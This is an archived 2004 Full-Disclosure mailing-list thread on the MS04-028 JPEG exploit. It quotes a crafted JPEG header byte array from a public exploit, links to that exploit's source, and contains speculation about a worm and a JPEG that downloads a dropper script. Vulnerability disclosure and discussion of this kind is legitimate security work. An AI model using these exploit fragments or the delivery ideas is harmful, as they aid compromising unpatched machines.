RE: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ...

["Todd Towles" <toddtowles () brookshires com>]

Isn't there a tool that will create the jpeg for it..and you can input
the URL you want the JPEG to download.

The JPEG will grab dropper script or whatever you want it too. No need
to revisit. Am I correct in thinking this? 

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of
Castigliola, Angelo
Sent: Monday, September 27, 2004 3:30 PM
To: morning_wood; full-disclosure () lists netsys com
Subject: RE: [Full-disclosure] MS04-028 Jpeg EXPLOIT with Reverse and
Bind shell ...

Eh, It would not be that hard to write up something that could revisit
all of the computers that hit the web server to infect them with
something after the initial jpg exploit was ran. It would truly be a one
of a kind worm. Reason enough in itself to motivate someone to write it.

As far as Media hype. I'm all for it. It keeps the IT job market strong.

Angelo Castigliola III
Operations Technical Analyst I
UnumProvident IT Services
207.575.3820
 
-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of
morning_wood
Sent: Saturday, September 25, 2004 2:06 PM
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] MS04-028 Jpeg EXPLOIT with Reverse and
Bind shell ...


umm, no
all this has thats different is correct headers for bind or remote shell
option. and ability to set ports and return ip in the code, instead of
needing to use your own shellcode ( or metasploits ) note: there is no
new exploit code or vector

------------------- / snip /----------------- new.
char header1[] =
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
------------------- / snip /----------------- old.
------------------- / snip /----------------- char header1[]=
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
------------------- / snip /-----------------

take your media hype and die kthnx,
m.wood


> the last step before the worm
>
> http://www.k-otik.com/exploits/09252004.JpegOfDeath.c.php

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html